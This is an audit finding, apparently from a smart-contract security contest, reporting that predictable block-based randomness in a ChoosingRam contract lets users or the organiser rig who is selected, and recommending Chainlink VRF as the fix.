Weak randomization in `ChoosingRam::increaseValuesOfParticipants` and `ChoosingRam::selectRamIfNotSelected`
Summary
Any NFT-holder can become selectedRam by calling ChoosingRam::increaseValuesOfParticipants and guessing the random number and waiting for the right moment. Also applicable for the Organiser by calling ChoosingRam::selectRamIfNotSelected.
Vulnerability Details
Generating random numbers based on block data is not secure, as an attacking contract/user can precalculate it and make decisions in its favor. In this case, a hash generated from block.timestamp, block.prevrandao, and msg.sender is being used, which are values that are available before entering the battle.
Furthermore, in Arbitrum, block.prevrandao is a constant 1, so the randomness is further diminished.
With this, a malicious user can guess the random calculations and know in advance if he will become the selectedRam.
Also the Organiser can know in advance the values before calling ChoosingRam::selectRamIfNotSelected, which poses a serious centralization issue.
Impact
An user can unfairly get picked as selectedRam or the Organiser could pick a user by himself.
Tools Used
Manual review
Recommendations
Implement a solution with a verifiable source of randomness, to ensure that the picked selectedRam is indeed randomly chosen.
You can use Chainlink VRF (refer to the official documentation for the initialization of VRFConsumerBase).
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.